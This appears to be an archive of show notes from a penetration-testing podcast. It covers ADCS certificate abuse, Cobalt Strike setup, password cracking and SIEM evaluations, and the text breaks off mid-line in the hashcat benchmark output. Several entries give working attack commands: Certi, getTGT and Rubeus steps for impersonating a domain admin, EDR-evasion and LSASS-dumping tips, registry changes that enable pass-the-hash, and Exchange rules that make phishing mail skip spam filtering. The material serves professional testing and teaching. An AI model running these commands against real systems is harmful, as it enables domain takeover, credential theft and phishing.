In the tangent department, Mrs. 7MS makes an appearance via phone and I bore you to tears about my continued iFly addiction.

7MS #502: Building a Pentest Lab in Azure Jan 05, 2022

Happy new year friends! Today I share the good, bad, ugly, and BROKEN things I've come across while migrating our Light Pentest LITE training lab from on-prem VMware ESXi to Azure. It has been a fun and frustrating process, but my hope is that some of the tips in today's episode will save you some time/headaches/money should you setup a pentesting training camp in the cloud.

Things I like

No longer relying on a single point of failure (Intel NUC, switch, ISP, etc.)
You can schedule VMs to auto-shutdown at a certain time each day, and even have Azure send you a notification before the shutdown so you can delay - or suspend altogether - the operation

Things I don't like

VMs are by default (I believe) joined to Azure AD, which I don't want. Here's how I got machines unjoined from Azure AD and then joined to my pwn.town domain:

dsregcmd /leave Add-Computer -DomainName pwn.town -Restart

Accidentally provision a VM in the wrong subnet? The fix may be rebuilding the flippin' VM (more info in today's episode).
Just about every operation takes for freakin' ever. And it's confusing because if you delete objects out of the portal, sometimes they don't actually disappear from the GUI for like 5-30 minutes.
Using backups and snapshots is archaic. You can take a snapshot in the GUI or PowerShell easy-peasy, but if you actually want to restore those snapshots you have to convert them to managed disks, then detach a VM's existing disk, and attach the freshly converted managed disks. This is a nightmare to do with PowerShell.
Deleting data is a headache. I understand Azure is probably trying to protect you against deleting stuff and not being able to get it back, but they night a right-click > "I know what I'm doing, DELETE THIS NOW" option. Otherwise you can end up in situations where in order to delete data, you have to disable soft delete, undelete deleted data, then re-delete it to actually make it go away. WTH, you say? This doc will help it make more sense (or not).

Things that are broken

Promiscuous mode - just plain does not work as far as I can tell. So I can't do protocol poisoning exercises with something like Inveigh.
Hashcat - I got CPU-based cracking working in ESXi by installing OpenCL drivers, but try as I may, I cannot get this working in Azure. I even submitted an issue to the hashcat forums but so far no replies.

On a personal note, it has been good knowing you because I'm about to spend all my money on a new hobby: indoor skydiving.

7MS #501: Tales of Pentest Pwnage - Part 31 Dec 29, 2021

Today we're closing down 2021 with a tale of pentest pwnage - this time with a path to DA I had never had a chance to abuse before: Active Directory Certificate Services! For the full gory details on this attack path, see the Certified Pre-Owned paper from the SpecterOps crew. The TLDR/TLDL version of how I abused this path is as follows:

Grab Certi
Grab Certify

Run Certify.exe find /vulnerable, and if you get some findings, review the Certified Pre-Owned paper and the Certify readme file for guidance on how to exploit them. In my case, the results I got from Certify showed:

msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT

Reading through the Certify readme, I learned "This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA)." The Certify readme file walks you through how to attack this config specifically, but I had some trouble running all the tools from my non-domain-joined machine. So I used a combination of Certify and Certi to get the job done. First I started on Kali with the following commands:

sudo python3 /opt/impacket/examples/getTGT.py 'victimdomain.domain/MYUSER:MYPASS' export KRB5CCNAME=myuser.cache sudo python3 ./certi.py req 'victimdomain.domain/MYUSER@FQDN.TO.CERT.SERVER' THE-ENTERPRISE-CA-NAME -k -n --alt-name DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE --template VULNERABLE-TEMPLATE NAME

From that you will get a .pfx file which you can bring over to your non-domain-joined machine and do:

rubeus.exe purge rubeus.exe asktgt /user:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE /certificate:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE@victim.domain.pfx /password:PASSWORD-TO-MY-PFX-FILE /domain:victimdomain.domain /dc:IP.OF.DOMAIN.CONTROLLER

And that's it! Do a dir \\FQDN.TO.DOMAIN.CONTROLLER\C$ and enjoy your new super powers!

7MS #500: Interview with John Strand Dec 22, 2021

HAPPY 500 EPISODES, FRIENDS! That's right, 7MS turned 5-0-0 today, and so we asked John Strand of Black Hills Information Security to join us and talk about all things security, including the John/BHIS superhero origin story, the future of pentesting, the (perceived) cybersecurity talent shortage, how to get started with good security practices in your organization, and more! P.S. check out John's first visit to the show here.

7MS #499: Desperately Seeking a Super SIEM for SMBs - Part 6 Dec 16, 2021

Today we have some cool updates on this SIEM-focused series we've been doing for a while. Specifically, I want to share that one of these solutions can now detect three early (and important!) warning signs that bad things are happening in your environment:

ASREPRoasting
WDigest flag getting flipped (reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1)
Restricted admin mode getting enabled (reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f) - see n00py's blog for more info

7MS #498: Securing Your Mental Health - Part 2 Dec 13, 2021

Hi everybody, today we're continuing a series we started way back in June called Securing Your Mental Health. Today I talk about some easy and relatively cheap things I'm doing to try and shutdown negative thoughts, punch imposter syndrome in the face, and be an overall happier and more positive person.

7MS #497: The Stress and Satisfaction of Offering Live Security Training Dec 02, 2021

Hey friends, today I'm giving you a peek behind the curtain of our Light Pentest LITE training to talk about the software/hardware we use to make it sing, the growing pains - and OMG(!) moments - that forced us to build in more infrastructure redundancy, and the cool (and expensive!) cloud options we're considering to offer a self-paced version of the course.

7MS #496: Tales of Pentest Pwnage - Part 30 Nov 24, 2021

Today's tale of pentesting has a bunch of tips to help you maximize your pwnage, including:

The new Responder DHCP poisoning module
All the cool bells and whistles from CrackMapExec which now include new lsass-dumping modules!
Speaking of lsass dumping, here's a new trick that works if you have Visual Studio installed (I bet it will be detected soon).

I close out today's episode with a story about how my Cobalt Strike beacons got burned by a dating site!

7MS #495: Desperately Seeking a Super SIEM for SMBs - Part 5 Nov 17, 2021

Today we continue our SIEM/SOC evaluation series with a closer look at one particular managed solution and how it fared (very well) against a very hostile environment: the Light Pentest LITE pentesting course! Spoiler alert: this solution was able to detect:

RDP from public IPs
Password spraying
Kerberoasting
Mimikatz
Recon net commands
Hash dumping
Hits on a "honey domain admin" account
Users with non-expiring passwords
Hits on the SSH/FTP/HTTP honeypot

7MS #494: Interview with Josh Burnham of Liquid Web Nov 10, 2021

7MS #493: 7MOIST - Part 2 Nov 04, 2021

Hey, remember back in episode #357 where we introduced 7MOIST (7 Minutes of IT and Security Tips)? Yeah, me neither :-). Anyway, we're back with the second edition of 7MOIST and have some cool pentesting and general IT tips that will hopefully make your life a little awesome-r:

Stuck on a pentest because EDR keeps gobbling your payloads? SharpCradle might just save the day!
CrackMapExec continues to learn new awesome tricks - including a module called slinky that plants hash-grabbing files on shares you have write access to!
Browsing 17 folders deep in Windows Explorer and wish you could just pop a cmd.exe from right there? You can! Just click into the path where you're browsing, type cmd.exe, hit Enter and BOOM! Welcome to a prompt right at that folder!

7MS #492: Tales of Pentest Pwnage - Part 29 Oct 28, 2021

Hello friends! We're long overdue for a tale of pentest pwnage, and this one is a humdinger! It's actually kind of three tales in one, focusing on pentesting wins using:

Manual "open heart surgery" on the root of the Active Directory domain
The new totally rad DHCP poisoning module of Responder
An opportunity to abuse GPOs with SharpGPOAbuse (P.S. we talked about this tool about a year ago in episode 441)

7MS #491: Interview with Louis Evans of Arctic Wolf Oct 20, 2021

Today we're joined by Louis Evans of Arctic Wolf to talk about all things cyber insurance, including:

History on cyber insurance - who's buying it, what it does and doesn't cover, and when it started to be something you didn't want to leave home without
What are insurance companies asking/demanding of customers before writing a cyber insurance policy?
What basic things organizations can do to reduce malware/ransomware incidents (whether they are considering a cyber insurance policy or not)?
How do I evaluate the various insurance carriers out there and pick a good one?

7MS #490: Desperately Seeking a Super SIEM for SMBs - Part 4 Oct 13, 2021

Hey friends! Today we're going to recap the SIEM/SOC players we've evaluated so far (Arctic Wolf, Elastic, Sumo Logic, Milton Security) and then talk about a new contender that was brought to our attention: Blumira (not a sponsor, but I'm really digging what I'm seeing/hearing/experiencing thus far)!

7MS #489: Ping Castle Oct 06, 2021

Today we're talking about Ping Castle (not a sponsor), an awesome tool for enumerating tons of info out of your Active Directory environment and identifying weaknesses, misconfigurations and paths to escalation! It's wonderful for both red and blue teamers.

Some of Ping Castle's cool features include being able find:

Kerberoastable and ASREPRoastable users
Plain text passwords lingering in Group Policy Objects
Users with never-expiring passwords
Non-supported versions of Windows
Machines configured with unconstrained delegation
Attack and escalation paths to Domain Admins

7MS #488: How to Succeed in Business Without Really Crying - Part 10 Sep 29, 2021

Today we continue our series focused on building a security consultancy and talk about:

A phishing campaign that went off the rails, and lessons learned from it
First impressions of an awesome tool to help add MFA to your Active Directory (not a sponsor)
A tangent story about how my wife brought some thieves to justice!

7MS #487: Light Pentest eBook Announcement! Sep 28, 2021

Hey friends! Today I've got some exciting personal/professional news to share: our Light Pentest eBook - which is a practical, step-by-step playbook for internal network penetration testing - is now available for purchase!

Note: this eBook and the Light Pentest LITE training are two separate things, but do cover some of the same topics.

The Light Pentest eBook covers:

Grabbing and analyzing packet captures
Abusing insecure network protocols
Exploiting (the lack of) SMB signing
Capturing, cracking and passing hashes
Locating high-value targets with DNS zone transfers
Exploiting vulnerable Group Policy Objects
Scraping screenshots of Web interfaces with WitnessMe
Finding and cracking "Kerberoastable" and "ASREPRoastable" Active Directory accounts
Dumping, passing and cracking hashes from domain controllers

The Light Pentest eBook is available now for $7.77, and by purchasing it you are entitled to all future editions/revisions going forward.

7MS #486: Interview with Matt Quammen of Blue Team Alpha Sep 22, 2021

Today our good buddy Joe Skeen and I virtually sit down with Matt Quammen of Blue Team Alpha to talk about all things incident response! Topics covered include:

Top 5 things to do and not do during ransomware event
Challenges when responding to ransomware events
Opportunities to break into infosec/IR
The value of tabletop exercises, and some great ideas for conducting your own
Incident response stress and success stories
Cyber insurance - worth it or not?

7MS #485: Interview with Christopher Fielder Sep 15, 2021

Today our friend Christopher Fielder from Arctic Wolf is back for an interview four-peat! We had a great chat about making sense of vendor alphabet soup terms (like SIEM, SOC, EDR/MDR/XDR, ML, AI and more!), optimizing your SOC to "see" as much as possible, tackling vendor/customer communication problems, and simplifying security product pricing to make purchases less stressful for customers!

And don't forget to check out Christopher's first, second and third interviews with 7MS.

7MS #484: Desperately Seeking a Super SIEM for SMBs - Part 3 Sep 08, 2021

Today we're continuing our series called Desperately Seeking a Super SIEM for SMBs - this time with a focus on a new contender in our bake-off: Perch Security!

It might help you to go back and take in part 1 and part 2, but today we're focusing on the first experience I had chatting with the sales/technical folks at Perch. TLDL: I really liked a lot of things I was hearing and seeing. Pros (perceived) include:

Simple pricing model
Easy to use dashboard
Cool "marketplace" of integrations you can add to your instance and start getting alerts for
Nice API integration that seemed pretty simple to use - and that covers a lot of different cloud products and services
Ticket dashboard looked straightfoward to use and interpret
Can quickly add IPs/subnets that you don't want to monitor, if appropriate

7MS #483: Desperately Seeking a Super SIEM for SMBs - Part 2 Sep 01, 2021

Today we continue our series we started recently (part 1 is here about finding a super SIEM for SMBs. Specifically I have some updates on (and frustrations with) Arctic Wolf, Elastic, Milton Security and Perch Security.

Here's the TLDL version:

Arctic Wolf They remain a strong contender in my bake-offs. They also could tick several boxes for an org as they offer continuous internal/external vulnerability scanning as well as a managed SOC. (And yes, I'm probably a tiny bit biased because I know a bunch of AWN's engineers and like the product)

Elastic I've loved my interactions with the sales folks and engineers at Elastic. My initial trial had some technical speed bumps (which Elastic helped me remedy). I eventually did get some Elastic agents enrolled on endpoints in my lab. However, now that I'm up and running (and admittedly I should go through the Webinars and online training), I'm feeling overwhelmed. There's a jillion menus and submenus to explore. I feel like I've been given a high-performance sports car but completely lack the knowledge on how to make the most of it. I'll keep Elastic in my back pocket, but I don't think I can feel comfortable handing this dashboard over to a SMB IT/security staff and have them run with it.

Milton Security A few weeks ago I had my first ever sales call with this group, and liked a lot of what I heard. They're up front about being a threat-hunt-as-a-service organization and they're not looking to partner with just any customer. The way they bundle sources of data (for the sake of pricing) makes sense to me, and although I haven't seen a formal quote from them yet, I think they will be reasonably priced when compared to some of the "big box" solutions.

Perch Security After part 1 of this series, several of you pinged me and said to check out Perch Security. I'm very excited to connect with them but had a tough time getting someone to respond to my inquires (two weeks to be exact). Good news is I've got a call scheduled with them this week and am anxious to share what I learn about Perch on our next episode in this series.

7MS #482: Creating Kick-Butt Credential-Capturing Phishing Campaigns - Part 3 Aug 26, 2021

Today we're continuing our discussion on phishing campaigns - including a technical "gotcha" that might redirect your phishing emails into a digital black hole if you're not careful!

As I mentioned last week, I've been heavy into spinning up and tearing down phishing campaigns, so I finally got around to documenting everything in episode 481.

This week I ran into a bizarre issue where test phishes to myself suddenly disappeared from my Outlook altogether! After chatting with some folks on Slack I did a message trace in the Exchange Admin Center under:

Mail flow > Message Trace > Start a trace then make the Sender field be the user you're sending phishing emails from. That showed me that my phishes were being quarantined!

To get around the quarantine, I went into Mail flow > Rules and then created a new rule with the following properties:

Apply this rule if > The sender's domain is > yourphishingdomain.com

Then under Do the following:

Set the spam confidence level (SCL) to...Bypass spam filtering

Under And, click the drop-down and choose:

Modify the message properties...set a message header...X-MS-Exchange-Organization-BypassClutter

Then click where it says Enter text and change header value to True and click OK.

7MS #481: Creating Kick-Butt Credential-Capturing Phishing Campaigns - Part 2 Aug 19, 2021

Today we're revisiting how to make a kick-butt cred-capturing phishing campaign with Gophish, Amazon Lightsail, LetsEncrypt, ExpiredDomains.net and a special little extra something that makes creating phishing landing pages waaaaaaayyyyyyyyyy easier!

For some quicker review, you can check out part 1 and also the complementary YouTube video, but I wanted to revisit this kick-butt process and update a few items:

First, this SingleFile extension is amaaaaaaaazing for making phishing landing pages with ease!

The process to get GApps to let you generate an app-specific password for using with GoPhish is kinda annoying. The steps below should get you going:

After domain registration, log into admin.google.com or click Manage Workspace button at checkout.
At the next screen click Workspace Admin Console. Sign in with the person you’ll be spoofing from, and the temporary password emailed to your backup email account during checkout.
In the search bar search for Less Secure Apps, choose Allow users to manage their access to less secure apps.
Now, in the upper right, hit Manage Your Google Account.
Under Security, click Protect your account and click Add phone number. Finish that process, then click Continue to your Google account.
Back at the main admin page, under Less secure app access, click Turn on access (not recommended).
At the next screen click Allow less secure apps: ON
Back at the main screen, click 2-Step Verification and set it to On.
Back at the main screen again, a new option called App passwords should be there. Click it. Choose to generate a custom name like LOL and then then an app password will appear. Write it down as it only appears once!

Finally, a quick reference for getting your LetsEncrypt cert to work with GoPhish. Get your LetsEncrypt cert generated, and then forge a .crt and .key file to use with GoPhish:

cp /etc/letsencrypt/live/YOUR-DOMAIN/fullchain.pem ./domain.crt cp /etc/letsencrypt/live/YOUR-DOMAIN/privkey.pem ./domain.key

Now go into the GoPhish .json config file and change the cert_path and key_path to the ones you just generated, and change use_tls to TRUE on both places in the config as well.

7MS #480: Desperately Seeking a Super SIEM for SMBs Aug 12, 2021

Today we're talking about the SIEM bake-off for SMBs that we've recently embarked on. We're currently evaluating several solutions - either for customer-facing purposes, internal kick-the-tires fun, or both.

Candiates include:

First we're starting by running each vendor through a series of questions, then likely following up with a demo where we'll run some technical tests and simulated hacking to see which vendor or vendors reign supreme!

7MS #479: A Prelude to PwnTown Aug 06, 2021

Hey friends, today we're talking about a new security training offering 7MinSec has created called Light Pentest LITE - Live Interactive Training Experience. It's a 3-day course (with each class session being 3 hours long) consisting of live (via Zoom), hands-on, instructor-led sessions that are focused on teaching you how to find, exploit and defend against common Active Directory weaknesses!

Check out today's episode to learn more and get a hint for an OSINT exercise that will get you 10% off of a Light Pentest LITE training session!

7MS #478: Password Cracking in the Cloud - Part 4 Jul 29, 2021

Hey friends, today we're continuing our discussion of password cracking by sharing some methodology that has helped us get a high cred yield, and some tips on taking cracked passwords from multiple sources and Frankensteining them into a beautiful report for your customer.

For some background, when 7MS started as a biz, we used to crack passwords in Paperspace but invested in an on-prem cracking rig a few years ago. That rig has been flipping sweet, but had some heating issues which prompted me to send the system in for warranty and use an awesome cracking rig in AWS in the meantime.

Whether you're cracking locally or in the cloud, here's a quick methodology that has cracked many a hash for us:

Do a straight-up hashcat crack against the PwnedPasswords list (at time of this writing I don't have a good source for the cracked versions of these passwords. I used to grab them at hashes.org. Anybody got an alternative?
Do a straight-up hashcat crack through the RockYou2021 list
Run the hatecrack methodology, including the quick crack, the quick crack with rules (I'm partial to OneRuleToRuleThemAll), and brute-forcing all 1-8 character passwords

Once I'm ready to wrap up all the cracked passwords and put them in a nice shiny report for the customer, I do the following (using hashcombiner and pipal):

# Run hash_combiner on hashcat’s pot file and write results to a file python /opt/hc/hash_combiner.py user_hash /opt/hashcat/hashcat.potfile > /tmp/round1.txt # Run hash_combiner on hatecrack’s pot file and write results to a file python /opt/hc/hash_combiner.py user_hash /opt/hatecrack/hashcat.pot > /tmp/round2.txt # Cat the two files together into a third file cat /tmp/round1.txt /tmp/round2.txt > /tmp/round3.txt # Sort and de-dupe the third file cat /tmp/round3.txt | sort -uf > /tmp/nice-and-clean.txt # Take just the passwords out of the “nice and clean” output cut -d ':' -f 2 /tmp/nice-and-clean.txt > /tmp/pipal-temp.txt # Score the passwords using pipal /opt/pipal/pipal.rb /tmp/pipal-temp.txt > /tmp/pip-final.txt

Now you've got a nice-and-clean.txt list of users and their cracked passwords, as well as the pip-final.txt with deeper analysis of cracked passwords, their commonalities, etc.

7MS #477: Cobalt Strike for Newbs Jul 21, 2021

Today we're talking about Cobalt Strike for newbs - including how to get it up and running, as well as some tools that will help you generate beacons while evading EDR at the same time!

Some helpful things mentioned in today's episode:

Wherever you spin up your CS instance, it's probably a good idea to lock down the firewall to only specific IPs. With Digital Ocean, I found this article helpful.
When generating CS listeners, the C2Concealer from FortyNorth helped me get malleable C2 profiles generated while creating a LetsEncrypt cert at the same time!
My CS beacons kept getting gobbled by AV, but the following resources helped me get some stealthy ones generated: Artifact Kit, PEzor and ScareCrow. Here's a specific ScareCrow example that flew under the EDR radar:

Scarecrow -I myrawshellcode.bin -etw -domain www.microsoft.com

PowerUpSQL is awesome for finding servers where you can run stored procedures to send your attacking box a priv'd hash to pass/capture/crack. Check out this presentation on PowerUpSQL to find vulnerable targets, then use mssql_ntlm_stealer module in Metasploit to have fun with the account hashes. Be sure to set your domain when configuring the Metasploit module!
When trying to pop an SMB shell with relay tools, I've had problems recently with those attempts being stopped by defensive tools. Then I found this gem which talks about tweaking smbexec.py to evade AV. It worked a treat!
When you use MultiRelay, I had no idea that it includes an upload function so you can simply upload your beacon.exe from a SYSTEM shell and fire it right from a command line. Cool!
Once my beacons started firing around the pentest environment, I temporarily allowed all IPs to talk to my Digital Ocean box - just because the IP I grabbed from a "what is my IP?" Google search didn't always match the actual beacons that called home. Once the beacon connectivity was established, I tweaked the beacon firewall rules to just let certain IPs in the door.
This Cobalt Strike Extension Kit was FREAKING sweet for adding "right click > do awesome stuff" functionality to CS like dump hashes, search for Kerberoastable accounts, setup persistence, etc.
Got a SYSTEM level shell but need to abuse a DA's privs? Tell the beacon to pull back a list of running processes, then click one (like explorer.exe) running under a DA's account and then impersonate it to add your account to the DA group!
Having issues dumping LSASS? This article from Red Canary gives you some great ideas to do it in a way that doesn't make AV throw a fit!
Trying to RDP using PtH? This article will help you out. And if you get warnings about not being able to RDP in because of some sort of login restriction, try adjusting this reg key with CME:

cme smb 10.1.2.3 -u Administrator -H THE-HASH-YOU-CAPTURED -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f'

7MS #476: Tales of Pentest Pwnage - Part 28 Jul 16, 2021

**STOP!** If you didn't listen to [last week's episode](https://7ms.us/7ms-475-tales-of-internal-network-pentest-pwnage-part-27/) you might want to, since this was a two-part tale of pwnage. Either way I'll get you up to speed and talk about why this was (of course) one of my favorite pentests ever.

7MS #475: Tales of Internal Network Pentest Pwnage - Part 27 Jul 08, 2021

Yeahhhhhh! Today's another fun tale of pentest pwnage, including:

The importance of starting your pentest with an AD account that actually has access to...ya know...stuff
The importance of starting your pentest plugged into a network that actually has...you know...systems connected to it!
This BHIS article is awesome for finding treasures in SMB shares
PowerUpSQL audits are a powerful way to get pwnage on a pentest - check out this presentation for some practical how-to advice
IPMI/BMCs often have weak creds and/or auth bypasses so don't forget to check for them. Rapid7 has a slick blog on the topic.
Don't forget to check for vulnerable VMWare versions because some of them have major vulnerabilities

7MS #474: Password Cracking in the Cloud - Part 3 Jun 30, 2021

Hey friends! Today we're dusting off an old mini-series about password cracking in the cloud (check out part 1 and part 2) and sharing some awesome info on building a monster of a cracking rig in AWS!

One reason we haven't talked about password cracking in the cloud in a while is because back in winter of 2019 I built baby's first password cracking. Unfortunately, this week, Hashy (the name I gave to the rig) is overheating, and GPUs are impossible to find, so what's a pentester to do?

Well, in today's episode I talk about this article from Sevnx which walks you through building a virtual password-cracking beast in the cloud. The article (complemented by a sweet video) will get you running in short order.

WARNING: running this instance is super expensive (the author warns the instance would cost ~$9k/month if you left it run continuously).

The steps are pretty straightforward, but between reboots I found that hashcat acted all wonky. Luckily, the article addresses that with this great tip:

Pro tip: Save the Cuda download somewhere. If you ever turn your cracker off and get errors running hashcat when you turn it back on, re-run the install line. We think AWS sometimes refreshes the drivers or something and hashcat doesn't like it very much.

If you need help installing one of my fave tools, hatecrack check out my password cracking in the cloud gist. Also, our buddy Joe pointed me towards a utility called duplicut to help de-dupe large password-cracking wordlists.

Once the AWS instance is setup, what kind of stats do we get out of this demon? Here's the result of hashcat -b:

Hashmode: 0 - MD5 Speed.#1.........: 55936.1 MH/s (47.79ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#2.........: 55771.4 MH/s (47.94ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#3.........: 55827.0 MH/s (47.88ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#4.........: 55957.7 MH/s (47.78ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#*.........: 223.5 GH/s Hashmode: 100 - SHA1 Speed.#1.........: 17830.1 MH/s (75.08ms) @ Accel:16 Loops:1024 Thr:1024 Vec:1 Speed.#2.........: 17774.0 MH/s (75.21ms) @ Accel:16 Loops:1024 Thr:1024 Vec:1 Speed.#3.........: 17780.9 MH/s (75.26ms) @ Accel:16 Loops:1024 Thr:1024 Vec:1 Speed.#4.........: 17795.6 MH/s (75.22ms) @ Accel:16 Loops:1024 Thr:1024 Vec:1 Speed.#*.........: 71180.6 MH/s Hashmode: 1400 - SHA2-256 Speed.#1.........: 7709.9 MH/s (86.84ms) @ Accel:8 Loops:1024 Thr:1024 Vec:1 Speed.#2.........: 7718.3 MH/s (86.75ms) @ Accel:8 Loops:1024 Thr:1024 Vec:1 Speed.#3.........: 7710.4 MH/s (86.75ms) @ Accel:8 Loops:1024 Thr:1024 Vec:1 Speed.#4.........: 7694.4 MH/s (87.02ms) @ Accel:8 Loops:1024 Thr:1024 Vec:1 Speed.#*.........: 30833.0 MH/s Hashmode: 1700 - SHA2-512 Speed.#1.........: 2399.8 MH/s (69.70ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#2.........: 2401.1 MH/s (69.68ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#3.........: 2397.3 MH/s (69.78ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#4.........: 2400.3 MH/s (69.70ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#*.........: 9598.5 MH/s Hashmode: 22000 - WPA-PBKDF2-PMKID+EAPOL (Iterations: 4095) Speed.#1.........: 866.5 kH/s (94.23ms) @ Accel:16 Loops:256 Thr:1024 Vec:1 Speed.#2.........: 866.7 kH/s (94.21ms) @ Accel:16 Loops:256 Thr:1024 Vec:1 Speed.#3.........: 865.6 kH/s (94.30ms) @ Accel:16 Loops:256 Thr:1024 Vec:1 Speed.#4.........: 866.7 kH/s (94.20ms) @ Accel:16 Loops:256 Thr:1024 Vec:1 Speed.#*.........: 3465.5 kH/s Hashmode: 1000 - NTLM Speed.#1.........: 102.2 GH/s (26.05ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#2.........: 102.3 GH/s (26.05ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#3.........: 102.2 GH/s (26.07ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#4.........: 102.3 GH/s (26.04ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#*.........: 409.0 GH/s Hashmode: 3000 - LM Speed.#1.........: 41104.7 MH/s (64.74ms) @ Accel:512 Loops:1024 Thr:64 Vec:1 Speed.#2.........: 40216.5 MH/s (66.11ms) @ Accel:512 Loops:1024 Thr:64 Vec:1 Speed.#3.........: 40507.3 MH/s (65.89ms) @ Accel:512 Loops:1024 Thr:64 Vec:1 Speed.#4.........: 39181.4 MH/s (68.13ms) @ Accel:512 Loops:1024 Thr:64 Vec:1 Speed.#*.........: 161.0 GH/s Hashmode: 5500 - NetNTLMv1 / NetNTLMv1+ESS Speed.#1.........: 55861.0 MH/s (47.87ms) @ Accel:32 Loops:1024 Thr:1024 Vec:2 Speed.#2.........: 55864.3 MH/s (47.87ms) @ Accel:32 Loops:1024 Thr:1024 Vec:2 Speed.#3.........: 55519.4 MH/s (47.98ms) @ Accel:32 Loops:1024 Thr:1024 Vec:2 Speed.#4.........: 55826.6 MH/s (47.89ms) @ Accel:32 Loops:1024 Thr:1024 Vec:2 Speed.#*.........: 223.1 GH/s Hashmode: 5600 - NetNTLMv2 Speed.#1.........: 3968.0 MH/s (84.37ms) @ Accel:4 Loops:1024 Thr:1024 Vec:1 Speed.#2.........: 3968.1 MH/s (84.38ms) @ Accel:4 Loops:1024 Thr:1024 Vec:1 Speed.#3.........: 3965.6 MH/s (84.38ms) @ Accel:4 Loops:1024 Thr:1024 Vec:1 Speed.#4.........: 3967.8 MH/s (84.37ms) @ Accel:4 Loops:1024 Thr:1024 Vec:1 Speed.#*.........: 15869.5 MH/s Hashmode: 1500 - descrypt, DES (Unix), Traditional DES Speed.#1.........: 1752.8 MH/s (95.32ms) @ Accel:32 Loops:1024 Thr:64 Vec:1 Speed.#2.........: 1729.3 MH/s (96.65ms) @ Accel:32 Loops:1024 Thr:64 Vec:1 Speed.#3.........: 1749.5 MH/s (95.53ms) @ Accel:32 Loops:1024 Thr:64 Vec:1 Speed.#4.........: 1740.6 MH/s (96.01ms) @ Accel:32 Loops:1024 Thr:64 Vec:1 Speed.#*.........: 6972.3 MH/s Hashmode: 500 - md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) (Iterations: 1000) Speed.#1.........: 24882.8 kH/s (50.59ms) @ Accel:16 Loops:1000 Thr:1024 Vec:1 Speed.#2.........: 24828.0 kH/s (50.60ms) @ Accel:16 Loops:1000 Thr:1024 Vec:1 Speed.#3.........: 24865.7 kH/s (50.60ms) @ Accel:16 Loops:1000 Thr:1024 Vec:1 Speed.#4.........: 24849.6 kH/s (50.59ms) @ Accel:16 Loops:1000 Thr:1024 Vec:1 Speed.#*.........: 99426.0 kH/s Hashmode: 3200 - bcrypt $2*$, Blowfish (Unix) (Iterations: 32) Speed.#1.........: 69071 H/s (54.00ms) @ Accel:4 Loops:16 Thr:24 Vec:1 Speed.#2.........: 68818 H/s (54.25ms) @ Accel:4 Loops:16 Thr:24 Vec:1 Speed.#3.........: 68926 H/s (54.13ms) @ Accel:4 Loops:16 Thr:24 Vec:1 Speed.#4.........: 69013 H/s (54.04ms) @ Accel:4 Loops:16 Thr:24 Vec:1 Speed.#*.........: 275.8 kH/s Hashmode: 1800 - sha512crypt $6$, SHA512 (Unix) (Iterations: 5000) Speed.#1.........: 386.4 kH/s (84.04ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#2.........: 377.9 kH/s (85.68ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#3.........: 372.3 kH/s (86.76ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#4.........: 382.7 kH/s (84.51ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#*.........: 1519.3 kH/s Hashmode: 7500 - Kerberos 5, etype 23, AS-REQ Pre-Auth Speed.#1.........: 1177.0 MH/s (71.08ms) @ Accel:256 Loops:128 Thr:32 Vec:1 Speed.#2.........: 1175.4 MH/s (71.17ms) @ Accel:256 Loops:128 Thr:32 Vec:1 Speed.#3.........: 1171.5 MH/s (71.28ms) @ Accel:256 Loops:128 Thr:32 Vec:1 Speed.#4.........: 1177.4 MH/s (71.05ms) @ Accel:256 Loops:128 Thr:32 Vec:1 Speed.#*.........: 4701.3 MH/s Hashmode: 13100 - Kerberos 5, etype 23, TGS-REP Speed.#1.........: 1068.5 MH/s (78.29ms) @ Accel:32 Loops:1024 Thr:32 Vec:1 Speed.#2.........: 1069.4 MH/s (78.25ms) @ Accel:32 Loops:1024 Thr:32 Vec:1 Speed.#3.........: 1068.4 MH/s (78.32ms) @ Accel:32 Loops:1024 Thr:32 Vec:1 Speed.#4.........: 1068.6 MH/s (78.29ms) @ Accel:32 Loops:1024 Thr:32 Vec:1 Speed.#*.........: 4275.0 MH/s Hashmode: 15300 - DPAPI masterkey file v1 (Iterations: 23999) Speed.#1.........: 148.5 kH/s (93.95ms) @ Accel:8 Loops:512 Thr:1024 Vec:1 Speed.#2.........: 148.4 kH/s (93.99ms) @ Accel:8 Loops:512 Thr:1024 Vec:1 Speed.#3.........: 148.5 kH/s (93.96ms) @ Accel:8 Loops:512 Thr:1024 Vec:1 Speed.#4.........: 148.4 kH/s (93.95ms) @ Accel:8 Loops:512 Thr:1024 Vec:1 Speed.#*.........: 593.8 kH/s Hashmode: 15900 - DPAPI masterkey file v2 (Iterations: 12899) Speed.#1.........: 80610 H/s (80.47ms) @ Accel:4 Loops:256 Thr:1024 Vec:1 Speed.#2.........: 80606 H/s (80.47ms) @ Accel:4 Loops:256 Thr:1024 Vec:1 Speed.#3.........: 80596 H/s (80.48ms) @ Accel:4 Loops:256 Thr:1024 Vec:1 Speed.#4.........: 80378 H/s (80.46ms) @ Accel:4 Loops:256 Thr:1024 Vec:1 Speed.#*.........: 322.2 kH/s Hashmode: 7100 - macOS 